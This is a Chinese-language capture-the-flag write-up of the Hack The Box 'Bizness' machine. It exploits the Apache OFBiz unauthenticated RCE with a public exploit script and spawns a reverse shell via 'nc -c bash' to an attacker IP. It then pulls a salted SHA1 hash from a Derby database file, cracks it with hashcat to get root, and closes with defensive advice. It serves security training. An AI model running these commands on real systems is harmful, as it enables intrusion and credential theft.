[Meachines][Easy]Bizness
字数 832 2025-08-18 11:38:32
Apache OFBiz 未授权RCE漏洞利用与提权教学文档
1. 目标识别与信息收集
1.1 端口扫描
使用nmap进行快速端口扫描:
nmap -p- 10.10.11.252 --min-rate 1000
1.2 Web目录扫描
使用dirsearch进行目录扫描:
dirsearch -u https://bizness.htb/
1.3 Web技术识别
使用whatweb识别网站技术:
whatweb https://bizness.htb/control/login
2. 漏洞发现与利用
2.1 漏洞识别
发现目标系统运行Apache OFBiz,存在未授权RCE漏洞
2.2 漏洞利用步骤
- 下载漏洞利用脚本:
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
cd Apache-OFBiz-Authentication-Bypass/
- 执行漏洞利用(反弹shell):
python3 exploit.py --url https://bizness.htb/ --cmd 'nc -c bash 10.10.16.23 10032'
3. 权限提升与后渗透
3.1 获取用户flag
cat /home/ofbiz/user.txt
用户flag:4f868ad44d8eb00d2d7d094bd5279de0
3.2 数据库文件分析
发现数据库文件包含密码哈希:
cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat
3.3 密码哈希破解
- 哈希格式分析:
b8fd3f41a541a435857a8f3e751cc3a91c174362:d
$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
- 哈希结构说明:
$SHA$:指示使用SHA哈希算法d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I:哈希值部分,其中d$可能是盐值
- 使用hashcat破解:
hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt
3.4 获取root flag
cat /root/root.txt
root flag:8c72dd83a893d66bef258dc1c43eb2e4
4. 技术要点总结
-
Apache OFBiz漏洞:该漏洞允许未经身份验证的远程代码执行,属于高危漏洞
-
哈希破解技巧:
- 需要先进行base64解码
- 转换为十六进制字符串后使用hashcat破解
- 注意识别哈希算法和盐值结构
-
后渗透路径:
- 通过数据库文件查找敏感信息
- 利用密码哈希破解实现权限提升
-
防御建议:
- 及时更新Apache OFBiz到最新版本
- 实施严格的访问控制
- 监控异常登录和文件访问行为
- 使用强密码策略防止哈希破解
5. 参考资源
- Apache OFBiz官方安全公告
- Hashcat官方文档(模式120对应SHA1加盐哈希)
- OFBiz认证绕过漏洞利用脚本:https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass